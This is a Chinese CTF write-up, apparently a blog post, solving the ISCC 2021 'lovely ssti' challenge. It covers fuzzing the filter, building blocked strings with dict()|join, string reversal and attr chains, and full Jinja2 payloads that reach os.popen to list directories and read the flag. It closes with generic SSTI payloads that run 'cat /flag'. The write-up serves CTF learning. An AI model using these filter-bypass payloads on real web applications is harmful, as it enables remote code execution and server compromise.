文章目录

  • FUZZ测试:
  • 了解一下SSTI常用的语句格式:
  • 说一下构造思路:
  • 构造
  • 题外话:(反转结果字符串)

再ISCC中遇到了一道SSTI的题目,拿来练练手,题目难度的化,相对于普遍的过滤来说,这个过滤要更狠一点把。
看题:
进去之后是这样的,也没有提示传参,但是题目是lovely ssti

盲猜who am i 传参点应该是这个表情,这里仕林哥哥直接告诉了表情包叫xiaodouni,我就不去信息搜集了

FUZZ测试:

测试结果:
过滤了:_ ‘’ requests chr . chr 实操过程中还出现了字符串反转
思路:
过滤 . : 采用 |attr可以绕过
过滤单引号: 可以用双引号或者request绕过
过滤了 _: 只能用request绕过
request绕过:只能构造字符串绕过
过滤chr:意味着一些特殊字符串我们不能自己构造

综上,我们只能采用自己构造字符串,然后拼接成命令使用:

了解一下SSTI常用的语句格式:

{{5*5}} 直接执行
{% set a="test" %}{{a}}      //设置变量
{% for i in ['t ','e ','s ','t '] %}{{i}}{%endfor%}  //执行循环  -->别忘了中间那个{{i}}
{% if 25==5*5 %}{{"success"}}{% endif %}  //条件执行

这里采用设置变量的方式拼接字符串:

说一下构造思路:

要拼接构造诸如__class__ \ _init__等词汇,肯定需要我们自己先找到相应字符,比如:
这里直接扔playload了:

lipsum|select|string|list).pop(24)
lipsum|select|string|list)[24]

这交了FLAG 开不了已经,建议大家自行尝试一下就知道什么意思了(主要还是列出我们可以用的字符串)

再构造之前再知道一点:

dict(cla=a,ss=b)|join

dict:取出键值,也就是key
join:连接键值
比如:
dict(cla=a,ss=b)|join(’++’) ==cla++ss
dict(cla=a,ss=b)|join(’+2’) ==cla+2ss
所以采用上述方式进行连接
接下来我们需要的字符串都可以自行构造了
不一一构造直接给出playload:

构造

{%set%20xiahua=(config|select|string|list)[24]%}
{%set%20gb=(xiahua,xiahua,dict(class=a)|join,xiahua,xiahua)|join%}
{%set%20ini=(xiahua,xiahua,dict(init=a)|join,xiahua,xiahua)|join%}
{%set%20glo=(xiahua,xiahua,dict(globals=a)|join,xiahua,xiahua)|join%}
{%set%20gm=(xiahua,xiahua,dict(ge=a,titem=a)|join,xiahua,xiahua)|join%}
{%set%20oo=dict(o=a,s=a)|join%}
{%%20set%20so=oo[::-1]%}
{%set%20pp=dict(pop=a,ne=b)|join%}
{%%20set%20opo=pp[::-1]%}
{%set%20shell=(dict(ls=a)|join)%}
{%set%20rd=(dict(read=a)|join)%}

上面就已经全部构造出了我们正常playload所需要的所有字符串
有个地方注意一下:

这里用[::-1]的原因是 第一行dict出来的os 会被服务区自动反转成 so 所以为了更好利用,我们这里需要自己反转一次
字符串构造完了,下面就进行rce:

{%print config|attr(gb)|attr(ini)|attr(glo)|attr(gm)(so)|attr(opo)(shell)|attr(rd)()%}

具不解释了 大家一个一个带进去就知道了
我自己构造的playload是:config.golbals.init.[os].popen(“ls”).read()
对照下来就是那个
但是这里最终只能ls
无法进入目录 ,因为使用了\就会404
我一直以为是\被过滤了,后来就一直再绕过无参数RCE,这里大意了
之所以404是因为python的键值里面不能出现特殊字符,python不支持这种变量命名
md这个地方卡了几个小时
前面提到过没有过滤双引号,那这里直接输入命令就可以了:

{%print config|attr(gb)|attr(ini)|attr(glo)|attr(gm)(so)|attr(opo)("ls /")|attr(rd)()%}

进入到子目录,这里没有放截图,打不开环境了
flag是再 /usr/flag_is_here.txt
这里依然有个过滤
flag字符被过滤 _被过滤,所以用linux通配符就可以了
{%print config|attr(gb)|attr(ini)|attr(glo)|attr(gm)(so)|attr(opo)(“ls /usr/???is?here???”)|attr(rd)()%}

完整的playload:

?xiaodouyu=
{%set%20xiahua=(config|select|string|list)[24]%}
{%set%20gb=(xiahua,xiahua,dict(class=a)|join,xiahua,xiahua)|join%}
{%set%20ini=(xiahua,xiahua,dict(init=a)|join,xiahua,xiahua)|join%}
{%set%20glo=(xiahua,xiahua,dict(globals=a)|join,xiahua,xiahua)|join%}
{%set%20gm=(xiahua,xiahua,dict(ge=a,titem=a)|join,xiahua,xiahua)|join%}
{%set%20oo=dict(o=a,s=a)|join%}
{%%20set%20so=oo[::-1]%}
{%set%20pp=dict(pop=a,ne=b)|join%}
{%%20set%20opo=pp[::-1]%}
{%set%20rd=(dict(read=a)|join)%}
{%print config|attr(gb)|attr(ini)|attr(glo)|attr(gm)(so)|attr(opo)("ls /usr/?????is?here????")|attr(rd)()%}

最后那个usr下的flag_is_here.txt记得不是很清楚了 ,建议大家自己ls 看一下到底叫什么,不要盲目复制粘贴

ISCC{SsT1_is_eAsy_T0_lEarn(~)}

题外话:(反转结果字符串)

这里遇到了一个反转,也就是[::-1]
同样,我们在做SSTI类型题目的时候,遇到过了了flag的值的时候,依然可以采用反转的形式读出

##直接命令执行输出反转flag字符
?name={{x.__init__.__globals__['__builtins__'].eval('__import__("os").popen("cat /flag").read()[::-1]')}}##通过打开文件的形式反转flag字符(这个操作有点骚,目前还没有用过)
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('txt.galf_eht_si_siht/'[::-1],'r').read() }}{% endif %}{% endfor %}

ISCC 2021 SSTI相关推荐

  1. ISCC 2021 WP

    文章目录 MISC 李华的红包 Retrieve the passcode 海市蜃楼-1 美人计 我的折扣是多少 区块链 Hack the Victim 检查一下 小明的宠物兔 变异的SM2 WEB ...

  2. ISCC 2021 部分题目WP

    ISCC 2021 部分题目WP 题目目录 练武题:web-ISCC客服一号冲冲冲(一) 练武题:web-介是嘛 练武题:web-Web01正则匹配最后的倔强 练武题:web- ISCC客服一号冲冲冲 ...

  3. [ISCC 2021]部分wp

    文章目录 海市蜃楼-1 Retrieve the passcode 我的折扣是多少 小明的表情包 Hack the Victim 美人计 李华的红包 小明的宠物兔 ISCC客服冲冲冲(一) 这是啥 W ...

  4. 电视剧《大秦赋》最近很火!于是我用Python抓取了“相关数据”,发现了这些秘密............

    前言 最近,最火的电视剧莫过于<大秦赋了>,自12月1日开播后,收获了不错的口碑.然而随着电视剧的跟新,该剧在网上引起了激烈的讨论,不仅口碑急剧下滑,颇有高开低走的趋势,同时该剧的评分也由 ...

  5. 【安全漏洞】DedeCMS-5.8.1 SSTI模板注入导致RCE

    漏洞类型 SSTI RCE 利用条件 影响范围应用 漏洞概述 2021年9月30日,国外安全研究人员Steven Seeley披露了最新的DedeCMS版本中存在的一处SQL注入漏洞以及一处SSTI导 ...

  6. iscc 2021wp

    目录 MISC 变异的SM2 区块链 Hack the Victim 海市蜃楼2 小明的表情包 李华的红包 Retrieve_the_passcode 海市蜃楼1 美人计 检查一下 小明的宠物兔 We ...

  7. ISCC——部分题wp

    练武场 WEB: ISCC客服冲冲冲(一) 知识点: js解密 解题思路: 1.打开后出现投票的页面 2.查看源码 发现可疑的function.js 3.function.js,js加密 var _0 ...

  8. [极客大挑战2021]web wp

    极客大挑战2021 Welcome2021 F12,提示请使用WELCOME请求方法来请求此网页 burp抓包,修改请求方法,发现f1111aaaggg9.php 再次请求得到flag Dark To ...

  9. 2021陇剑杯 线下记录

    很久没有发博客了,之前写都是存笔记,但这次觉得有必要发一下,题目也分享一下,自我感受收获挺大的一次比赛. 第一次线下做修复的题目,赛前一直以为陇剑线下只有rhg赛道的pwn和一些流量分析题目,结果还出 ...

最新文章

  1. [luogu 3773][CTSC 2017]吉夫特
  2. 2. Add Two Numbers(Leetcode)
  3. 戴尔塔式服务器各型号,戴尔_PowerEdge T440_塔式服务器_网络存储服务器_服务器 | Dell 中国大陆...
  4. 华为手机连电脑_华为手机微信聊天记录如何导出电脑的四大方法
  5. tomcat(2)一个简单的servlet容器
  6. flutter Toast消息提示框
  7. QT每日一练day22:键盘事件
  8. pr如何跳到关键帧_pr怎么跟踪?pr怎么做运动跟踪怎么用?
  9. 计算机拓展名cad,CAD用到的各种文件格式有哪些
  10. EasyNVR网页/微信播放RTSP摄像机HLS/RTMP播放时出现起播等待问题的优化过程
  11. Mysql orchestrator高可用
  12. 【软件测试】可以写进简历的项目实战内容
  13. Mac关闭某个软件的所有窗口
  14. 部署策略对比:蓝绿部署、金丝雀发布及其他
  15. 冷却红外成像的全球与中国市场2022-2028年:技术、参与者、趋势、市场规模及占有率研究报告
  16. C语言——分支语句和循环语句(分支语句)
  17. nth-child 与 nth-of-type
  18. python 02 --python从安装到学习精品网站(廖雪峰官方网站)
  19. python基于PHP旅游网站的设计与开发
  20. 画中画怎么制作?教你如何录制画中画视频,图文教学

热门文章

  1. python中datetime与str的互相转化
  2. 【《Real-Time Rendering 3rd》 提炼总结】(十一) 第十四章 : 游戏开发中的渲染加速算法总结
  3. 看漫画学python下载_Python爬虫实现漫画下载 - 『编程语言区』 - 吾爱破解 - LCG - LSG |安卓破解|病毒分析|www.52pojie.cn...
  4. python表示分数_python分数怎么表示什么
  5. 基于 JavaFX 开发的聊天客户端 OIM-即时通讯
  6. php生成二维码海报
  7. 扫描仪显示计算机无法,扫描仪无法显示怎么办 扫描仪无法显示解决方法【详解】...
  8. html把字母a显示为其asc码,HTML ASCII码
  9. cdr文字内容显示不出来_电脑装的字体cdr里面不显示怎么办
  10. android屏幕录制功能,Android利用ADB进行屏幕录制